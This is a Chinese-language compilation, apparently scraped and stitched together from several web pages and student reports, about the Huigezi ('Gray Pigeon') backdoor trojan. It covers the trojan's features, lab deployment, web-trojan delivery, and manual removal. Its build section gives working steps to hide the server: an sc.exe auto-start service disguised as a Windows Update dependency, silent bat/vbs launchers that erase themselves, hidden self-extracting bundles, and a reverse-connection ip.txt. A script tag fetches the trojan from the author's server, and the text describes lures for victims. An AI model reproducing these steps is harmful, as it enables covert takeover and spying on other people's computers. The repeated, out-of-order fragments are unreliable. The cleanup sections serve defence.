关于灰鸽子的原理以及制作和清理
如何使用灰鸽子软件
灰鸽子[VIP 专业版]1.只用一个端口来传输所有通讯数据!普通同类软件都用到了两个或两个以上的端口来完成!2.支持可以控制Internet连接共享、HTTP透明代理上网的电脑!软件智能读取系统设定的代理服务器信息,无需用户设置!3.无需知道服务端IP,自动上线功能让服务端自动上线报道!灰鸽子专用的上线系统无需您注册免费域名才能使用,同时也提供了备用上线方式,在我们的专用上线系统出现故障时,您可以使用备用上线方式来使用自动上线功能。
在使用专用上线系统时,你还可以控制远程电脑通过Socks5代理来中转自动上线。
4.自动上线可以在第一次设置分组,自定义上线图像,上线备注等,这样都可以让你轻而易举的找到目标主机,同时设置连接密码保证了服务主机的安全性!同时具用牵手版的搜索符合条件主机的功能:a.从主机窗口筛选:可以列出只有某个窗口的一批主机,可以轻松找到哪些人在玩某个游戏!b.从主机进程筛选:可以列出运行了某个程序的一批主机,例如QQ.exe,就可以找到打开了QQ的自动上线主机有哪些了!5.文件管理:管理远程电脑的文件系统,支持复制、粘贴、删除,断点下载、上传文件或文件夹,文件内容均以加密方式传输,确保通讯的安全性.6.远程控制命令:包括远程系统信息、剪切板信息、进程管理、窗口管理、键盘记录、服务管理、管理管理、MS-DOS模拟、代理服务控制!7.注册表编辑器:可以像操作本机注册表一样的编辑远程注册表。
8.常用命令广播,让你控制主机众多主机更多的方便!详细的在线主机线表显示了:主机IP地址,地址位置,电脑名称,系统版本,备注等信息,9.除了具有语音监听、语音发送,还有远程视频监控功能,只有远程计算机有摄像头,且正常打开没有被占用,那么你可以看到,远程摄像头捕获的图片!还可以把远程摄像头捕获的画面存为Mpeg-1格式.远程语音也可以录制成Wav声音文件。
10.可以设置服务端开放Socks5代理服务器功能和HTTP代理服务功能!无需第三方软件支持!支持Windows9x/ME/2000/Xp/2003。
灰鸽子病毒检测及清除的手段方法
4、根据灰鸽子原理分析我们知道,如果Game_Hook.DLL是灰鸽子的文件,则在操作系统安装目录下还会有Game.exe和Game.dll文件。打开Windows目录,果然有这两个文件,同时还有一个用于记录键盘操作的GameKey.dll文件。
[img][/img]
经过这几步操作我们基本就可以确定这些文件是灰鸽子服务端了,下面就可以进行手动清除。
2000/XP系统:
1、打开注册表编辑器(点击“开始”-》“运行”,输入“Regedit.exe”,确定。),打开HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services注册表项。
2、点击菜单“编辑”-》“查找”,“查找目标”输入“game.exe”,点击确定,我们就可以找到灰鸽子的服务项(此例为Game_Server,每个人这个服务项名称是不同的)。
灰鸽子病毒 是一个免杀的远程控制软件,但是作为病毒使用也很方便
一、灰鸽子病毒详细简介
灰鸽子是国内一款著名后门。比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的集大成者。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。这就好比火药,用在不同的场合,给人类带来不同的影响。对灰鸽子完整的介绍也许只有灰鸽子作者本人能够说清楚,在此我们只能进行简要介绍。
1、由于灰鸽子的文件本身具有隐藏属性,因此要设置Windows显示所有文件。打开“我的电脑”,选择菜单“工具”—》“文件夹选项”,点击“查看”,取消“隐藏受保护的操作系统文件”前的对勾,并在“隐藏文件和文件夹”项中选择“显示所有文件和文件夹”,然后点击“确定”。
灰鸽子实验报告
实验报告实验名称灰鸽子木马实验报告课程名称网络安全院系部:信息技术系专业班级:网络101学生姓名:学号:***********一、实验目的及要求:[目的]1、了解灰鸽子是一个集多种控制方法于一体的木马病毒。
[内容及要求]1、练习软件的哪些功能,自己总结2、通过实验了解灰鸽子是一款的远程控制软件。
3、熟悉使用木马进行网络攻击的原理和方法。
[试验环境]虚拟机下安装组建一个局域网,2台安装了win2000/win2003/XP系统的电脑,灰鸽子木马软件。
二、实验方法与步骤:(1)打开虚拟机,开启windows server 2003 A 与 windows server 2003 B ,将其网络设备器设置在同一局域网内(例vmnet2)(2)打开灰鸽子,并查看本机IP地址:(3)点击配置服务程序,新建一个木马病毒:密码可设置也可不设置(3)将生产的木马病毒设法放入目标主机,并使其运行:(原始木马样子)(4)目标主机运行后,本机灰鸽子显示其登录:我们可对目标及进行,下载上传等基本运行(5)还可以进行更深层次的控制,例如屏幕捕捉与控制,广播,关机开机,注册表的编辑等(看红框标识处):(6)灰鸽子木马的伪装,木马捆绑器:现今社会杀毒软件的辨识度已然很高,而人们的警惕度也越来越高,木马若想成功的被目标主机运行,必然要做一定的伪装生成一个可执行文件,虽然风险乜很高,但不失为一种方法!(6)木马分离器:三、使用心得(1)熟悉灰鸽子之后,我们了解了木马的强大以及危害之处,如何防范木马,是当今信息社会的一种不可不重视的问题。
计算机病毒泛滥尤以木马病毒为甚。
木马病毒是一种远程控制程序,“黑客”利用计算机系统和软件的漏洞将一段程序植入远端电脑后,可以借助其配套的控制程序来远程控制中毒电脑,肆无忌惮地查看、下载他人电脑中的内容。
掌握了它的原因,对于防护电脑避免木马入侵我们应该有一定对策!(2)如何防范木马病毒:一、检测网络连接二、禁用不明服务三、轻松检查账户四、及时修补漏洞和关闭可疑的端口五、安装杀毒软件并及时更新六、运行实时监控程序。
灰鸽子实验
灰鸽子远控软件使用实验
“灰鸽子”是现在网络上非常流行的一种木马,由两部分组成,一是控制端(主程序),一是服务端(也叫受控端)。
任一部分都会被主流的杀毒软件查杀,但随着其不断衍生新的变种和一些免杀技巧经常绕过一些主动防御软件,使得用户防不胜防。
灰鸽子客户端和服务端都是采用Delphi编写。
黑客利用客户端程序配置出服务端程序。
可配置的信息主要包括上线类型(如等待连接还是主动连接)、主动连接时使用的公网IP(域名)、连接密码、使用的端口、启动项名称、服务名称,进程隐藏方式,使用的壳,代理,图标等等。
“灰鸽子”的服务端是由控制端主程序配置自动生成,黑客在配置自动上线的时候一般会用到ftp自动上线和动态域名解析两种手法,目的是让鸽子以后每天都会自动上线,而不受自身IP改变的影响。
当配置好服务端后,黑客会利用一切可能的手段达到入侵的目的,当用户电脑“中马”后,黑客就会拥有用户电脑的最高管理权限,包括随意修改、窃取用户电脑的文件,监控电脑的键盘和屏幕、摄像头等等。
在主控端生成灰鸽子木马
把灰鸽子生成的服务端拷贝到受控端
对受控端进行一系列的操作对受控端进行监控
屏幕监控
系统信息
文件下载
实验总结
在日常生活中一些不法分子会利用一些邮件、网站的连接放置木病毒,所以在看到一些可疑的连接不要轻易去点击,一旦点击便会中木马病毒。
因此遇到一些不明的连接的情况下,一定要警惕,不要轻易点击陌生的连接。
灰鸽子基础原理
2.本地电脑为动态IP,,则配置服务端可以用域名转向,也就是上面举的例子。
不能上线。
这里我得解释一个问题,内网环境下,电脑要和外界通信,必须得通过路由器,这就相当于路由器把它之下的电脑与外界隔离。
如果在电脑与路由器之间铺设一条路,通向外面,这样鸽子就能上线。具体来说,就是路由器开放8000端口与你的电脑直接相连,这样,鸽子
找到路由器,看到8000端口,就会由8000端口进来连接你的电脑,这样鸽子就找到我们的电脑,鸽子就上线了。
这样肉鸡2运行灰鸽子服务端后,会连接肉鸡1的8000端口,但此时肉鸡1并没有开放8000端口。这时我们在本地用端口映射工具控制端选择“映射”,这样肉鸡1就会开放8000端口,并把来自8000端口的连接转向我们本地电脑,也就是会把肉鸡2的连接转到我们本地电脑。这样鸽子就上线了。概括的说,就是,肉鸡2连接肉鸡1的8000端口,而肉鸡1会把来自8000端口的连接转到我们本地电脑。.
比如,先举个简单直观的例子。寝室有3台电脑,用交换机相连,这就意味着这3台电脑是不能接入互连网的。但彼此间可以通信。我们分别把3台电脑的IP 设置为192.168.0.1、192.168.0.2、192.168.0.3。假设我电脑的IP为其中一台,IP为第一个。如果我来配置服务端,打开灰鸽子,点击“配置服务程序”——“自动上线设置”处。我们添192.168.0.1,其他的选项不用管。直接点“生成服务器”这样就配置好了。你让另外2台电脑运行,或自己运行,都可以,都会上线,因为服务端很容易就找到了你的IP 192.168.0.1,并上线。这就好比,你养了只聪明的鸽子,你告诉它你的地址,这样每次它都会飞回来。
浏览网页中木马的原理和防范--灰鸽子网页木马的制作和解析
浏览网页中木马的原理和防范--灰鸽子网页木马的制作和解析1.网页木马从原理如果你访问××网站(国内某门户网站),你就会中灰鸽子木马。
这是我一黑客朋友给我说的一句说。
打开该网站的首页,经检查,我确实中了灰鸽子。
怎么实现的呢?他说,他侵入了该网站的服务器并在网站主页上挂了网页木马;一些安全专家常说,不要打开陌生人发来的网址,为什么?因为该网址很有可能就是一些不怀好意者精心制作的网页木马。
以上只是网页木马的两种形式,实际上网页木马还可以挂在多媒体文件(RM、RMVB、WMV、WMA、Flash)、电子邮件、论坛等多种文件和场合上。
很可怕吧,那么用户如何防范网页木马呢?下面我们就先从网页木马的攻击原理说起。
一、网页木马的攻击原理首先明确,网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。
为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。
有朋友会说,打开一个网页,IE浏览器真的能自动下载程序和运行程序吗?如果IE真的能肆无忌惮地任意下载和运行程序,那天下还不大乱。
实际上,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。
下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。
⒈自动下载程序<SCRIPT LANGUAGE="icyfoxlovelace" src="hxxp:///1.exe"></SCRIPT>小提示:代码说明a. 代码中“src”的属性为程序的网络地址,本例中“/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序,这段代码能让网页下载该程序到浏览它的电脑上。
灰鸽子病毒(Backdoor.Gpigeon)介绍及清除方法-电脑资料
灰鸽子病毒(Backdoor.Gpigeon)介绍及清除方法-电脑资料
灰鸽子的特点是“三个隐藏”——隐藏进程、隐藏服务、隐藏病毒文件,。
灰鸽子2005感染系统后,将自身注册为系统服务,并在同一目录下生成一组(3个)隐藏的病毒文件.
HijackThis是荷兰学生merijn开发系统扫描工具,能够扫描系统版本,进程,启动项,服务项等信息,对于分析解决IE浏览器问题,以及分析病毒,木马问题有很大帮助
HijackThis扫描的log可用记事本打开。
用HijackThis 1.99.1 扫描系统信息,可以帮助解决问题
下载地址:
扫描出的结果很多都是无害的甚至是正常系统必须的,如果不是非常有把握,请勿修改!
使用方法: 解压到一个文件夹,运行HijackThis“扫描系统并保存日志”,把日志文件保存到桌面,然后用记事本打开那个文件,找到病毒所在处.
复以下项目:O23 - NT 服务: pms (Portable Media Serial) - Unknown owner - C:/WINDOWS/IEXPL0RE.EXE !
修复后重启电脑,全盘杀毒,
电脑资料
《灰鸽子病毒(Backdoor.Gpigeon)介绍及清除方法》(https://www.)。
在“安全模式”下,在“文件夹选项”的“查看”面板中勾选“显示系统文件夹内容”、“显示所有文件及文件夹”两个选项,按“确定”按钮。
根据HijackThis日志中提示的病毒文件所在路径,找到病毒文件,删除之。
重启系统,手工杀毒即告完成。
怎么样才能彻底清除“灰鸽子”病毒
怎么样才能彻底清除“灰鸽子”病毒灰鸽子病毒,像鸽子一样,飞的快,传染快,那么我们要怎么彻底打掉这只飞的快的“鸽子”呢?下面由店铺给你做出详细的彻底清除灰鸽子病毒介绍!希望对你有帮助!彻底清除灰鸽子病毒介绍:手工清除灰鸽子并不难,重要的是我们必须懂得它的运行原理。
灰鸽子的运行原理灰鸽子木马分两部分:客户端和服务端。
黑客(姑且这么称呼吧)操纵着客户端,利用客户端配置生成出一个服务端程序。
服务端文件的名字默认为G_Server.exe,然后黑客通过各种渠道传播这个木马(俗称种木马或者开后门)。
种木马的手段有很多,比如,黑客可以将它与一张图片绑定,然后假冒成一个羞涩的MM通过QQ把木马传给你,诱骗你运行;也可以建立一个个人网页,诱骗你点击,利用IE漏洞把木马下载到你的机器上并运行;还可以将文件上传到某个软件下载站点,冒充成一个有趣的软件诱骗用户下载……G_Server.exe运行后将自己拷贝到Windows目录下(98/xp下为系统盘的windows目录,2k/NT下为系统盘的Winnt目录),然后再从体内释放G_Server.dll和G_Server_Hook.dll到windows目录下。
G_Server.exe、G_Server.dll和G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端,有些灰鸽子会多释放出一个名为G_ServerKey.dll的文件用来记录键盘操作。
注意,G_Server.exe这个名称并不固定,它是可以定制的,比如当定制服务端文件名为A.exe 时,生成的文件就是A.exe、A.dll和A_Hook.dll。
Windows目录下的G_Server.exe文件将自己注册成服务(9X系统写注册表启动项),每次开机都能自动运行,运行后启动G_Server.dll 和G_Server_Hook.dll并自动退出。
G_Server.dll文件实现后门功能,与控制端客户端进行通信;G_Server_Hook.dll则通过拦截API调用来隐藏病毒。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
“灰鸽子”攻击原理以及制作和清理院别计算机科学与通信工程学院专业计算机科学与技术班级学号4090511姓名唐盼指导教师曲荣欣成绩2012年 6 月7 日“灰鸽子”攻击原理以及制作和清理一.灰鸽子简介:“灰鸽子”是一种远程控制软件. 最早出现的时候是在模仿前辈“冰河”。
“灰鸽子”在2001年出现的,采用Delphi编写,最早并未以成品方式发布,更多的是以技术研究的姿态,采用了源码共享的方式出现在互联网,导致”灰鸽子”迅速发展起来.并且出现了多种不同的版本. “灰鸽子”在出现的时候使用了当时讨论最多的“反弹端口”连接方式,用以躲避大多数个人网络防火墙的拦截。
由于服务端都以隐藏方式启动,就奠定了其恶意后门木马的地位.而我个人就是高中时候,在”灰鸽子”最盛行和风靡的时候,开始认识”灰鸽子”和关注网络安全这个话题.这也是我最早认识和接触到一种黑客软件.在伴随着”灰鸽子”的盛行发展的同时,自己的对网络互联网安全问题的兴趣也随着同步提高.在有关黑客攻击和防范领域过程中享受这种成就感.但是对于”灰鸽子”的了解大多都是来自于<<电脑报>>,<<电脑爱好者>>这些杂志.没有深入了学习.但是”灰鸽子”这个概念却深入脑海.一直伴随我成长到如今.如今虽然”灰鸽子”已经不再流行,但是这个在我心底有着深刻影响的软件,已然成了一个黑客软件的代名词.二,灰鸽子基本原理:“灰鸽子”客户端和服务端都是采用Delphi编写。
黑客利用客户端程序配置出服务端程序。
可配置的信息主要包括上线类型(如等待连接还是主动连接)、主动连接时使用的公网IP(域名)、连接密码、使用的端口、启动项名称、服务名称,进程隐藏方式,使用的壳,代理,图标等等。
客户端简易便捷的操作使刚入门的初学者都能充当黑客。
当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。
但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。
服务端配置出来的服务端文件文件名为G_Server.exe(这是默认的,当然也可以改变)。
然后黑客利用一切办法诱骗用户运行G_Server.exe程序。
G_Server.exe运行后将自己拷贝到Windows目录下(98/xp下为系统盘的windows目录,2k/NT下为系统盘的Winnt目录,不支持win7系统.在win7做实验没有成功.生成的服务端不能在win7环境下运行).然后再从体内释放G_Server.dll和G_Server_Hook.dll到windows目录下。
G_Server.exe、G_Server.dll和G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端, G_Server_Hook.dll负责隐藏灰鸽子。
通过截获进程的API调用隐藏灰鸽子的文件、服务的注册表项,甚至是进程中的模块名。
截获的函数主要是用来遍历文件、遍历注册表项和遍历进程模块的一些函数。
所以,有些时候用户感觉中了毒,但仔细检查却又发现不了什么异常。
有些灰鸽子会多释放出一个名为G_ServerKey.dll的文件用来记录键盘操作。
注意,G_Server.exe这个名称并不固定,它是可以定制的,比如当定制服务端文件名为A.exe时,生成的文件就是A.exe、A.dll和A_Hook.dll。
Windows目录下的G_Server.exe文件将自己注册成服务(9X系统写注册表启动项),每次开机都能自动运行,运行后启动G_Server.dll和G_Server_Hook.dll并自动退出。
G_Server.dll文件实现后门功能,与控制端客户端进行通信;G_Server_Hook.dll则通过拦截API调用来隐藏病毒。
因此,中毒后,我们看不到病毒文件,也看不到病毒注册的服务项。
随着灰鸽子服务端文件的设置不同,G_Server_Hook.dll有时候附在Explorer.exe的进程空间中,有时候则是附在所有进程中。
三;灰鸽子制作实例步骤:准备工具:灰鸽子服务端; IcoSprite图标更改器;SC.exe服务添加删除更改工具;winrar压缩软件用于捆绑生成的程序.制作过程:1. 首先自己配置一下鸽子服务端,配置时[启动项设置]这里面的都不要填,不要写入注册表,也不要用服务启动。
2.用SC创建一个服务运行CMD.EXE 在system32的目录下运行执行SC.exe create huigezi BinPath= "%systemroot%\system32\gezi.exe" type=own type= interact start= auto DisplayName= "gezi".这句是用SC建立一个服务,服务名为huigezi,路径Binpath为"%systemroot%\system32\gezi.exe",类型type为 own 与interact交互,启动类型start为自动,显示名DisplayName为"gezi"。
sc.exe descript_ion huigezi "不死鸽子"这句是将huigezi服务的描改为“不死鸽子” sc config wuauserv depend= huigezi配置huigezi使wuauserv服务依存此服务(wuauserv可以根据自己喜欢改成其它服务,这里的wuauserv是系统在Windows Update网站的自动更新服务)。
这里的目的是迷惑别人,使其不敢轻易停止我们生成的服务。
3.将这些从注册表导出,我们将他命名为1.reg4.创建一个BAT文件,并命名为update.bat@regedit /s %systemroot%\system32\1.reg@%systemroot%\system32\gezi.exe@del /q /f /s %systemroot%\system32\1.reg@del /q /f /s %systemroot%\system32\Update.vbs@del /q /f /s %systemroot%\system32\Update.bat5.创建一个vbs并命名为update.vbs目的是为了作用是令bat里的内容以安静模式执行,这样就可以让cmd 窗口跳出来了,增加了不少隐蔽性.代码如下:On Error Resume Nextset wshshell=createobject ("wscript_.shell")a=wshshell.run ("cmd.exe /C %systemroot%\system32\Update.bat", 0, TRUE)6.用我门配置出来的服务端,并命名为run.exe,用run.exe做一个自解压文件,并命名为gezi.exe.。
将解压模式为全部隐藏.解压后运行run.exe,服务端做免杀7.将gezi.exe , 1.reg, Update.vbs, Update.bat 再用winrar制作一个自解压文件,解压到%systemroot%\system32\ 解压后运行Update.vbs当然解压模式依旧全部隐藏,替换同名文件.客户端控制的准备工作:1, 当然是下载灰鸽子的软件2. 申请一个免费的主页空间,因为灰鸽子是可以反弹式链接的,也就是说,服务端通过登陆你的主页的特定文件就可以主动连接到你的电脑让你控制了。
3. 首先在电脑上新建一个ip.txt的文本文件,内容如下:http://huigezi 111.227.252.212:8000end其中111.227.252.212这个是我的电脑目前的IP地址,8000是连接的端口,然后把这个文件上传到你申请的空间,它的目的是客户端上线的话就会去这个网站读取这个文件,然后主动和我取得连接。
然后运行 sunray.exe,在后然后运行 http.exe 点开始服务!最后,运行客户端,也就是H_Client.exe这个文件. 点击“自动上线”选项.四:清理灰鸽子一.灰鸽子的手工检测由于灰鸽子拦截了API调用,在正常模式下服务端程序文件和它注册的服务项均被隐藏,也就是说你即使设置了“显示所有隐藏文件”也看不到它们。
此外,灰鸽子服务端的文件名也是可以自定义的,这都给手工检测带来了一定的困难。
但是灰鸽子的检测仍然是有规律可循的。
从上面的运行原理分析可以看出,无论自定义的服务器端文件名是什么,一般都会在操作系统的安装目录下生成一个以“_hook.dll”结尾的文件。
通过这一点,我们可以较为准确手工检测出灰鸽子服务端。
由于正常模式下灰鸽子会隐藏自身,因此检测灰鸽子的操作一定要在安全模式下进行。
进入安全模式的方法是:启动计算机,在系统进入Windows启动画面前,按下F8键(或者在启动计算机时按住Ctrl键不放),在出现的启动选项菜单中,选择“Safe Mode”或“安全模式”。
1、由于灰鸽子的文件本身具有隐藏属性,因此要设置Windows显示所有文件。
打开“我的电脑”,选择菜单“工具”—》“文件夹选项”,点击“查看”,取消“隐藏受保护的操作系统文件”前的对勾,并在“隐藏文件和文件夹”项中选择“显示所有文件和文件夹”,然后点击“确定”。
2、打开Windows的“搜索文件”,文件名称输入“_hook.dll”,搜索位置选择Windows的安装目录(默认98/xp为C:\windows,2k/NT为C:\Winnt)。
3、经过搜索,我们在Windows目录(不包含子目录)下发现了一个名为Game_Hook.dll的文件。
4、根据灰鸽子原理分析我们知道,如果Game_Hook.DLL是灰鸽子的文件,则在操作系统安装目录下还会有Game.exe和Game.dll文件。
打开Windows目录,果然有这两个文件,同时还有一个用于记录键盘操作的GameKey.dll文件。
经过这几步操作我们基本就可以确定这些文件是灰鸽子服务端了,下面就可以进行手动清除。
二、灰鸽子的手工清除经过上面的分析,清除灰鸽子就很容易了。
清除灰鸽子仍然要在安全模式下操作,主要有两步:1、清除灰鸽子的服务;2删除灰鸽子程序文件。
但是为了防止误操作,清除前做好备份。
(一)、清除灰鸽子的服务注意清除灰鸽子的服务一定要在注册表里完成,清除灰鸽子的服务一定要先备份注册表,或者到纯DOS下将注册表文件更名,然后在去注册表删除灰鸽子的服务。
因为病毒会和EXE文件进行关联2000/XP系统:1、打开注册表编辑器(点击“开始”-》“运行”,输入“Regedit.exe”,确定。
),打开HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services注册表项。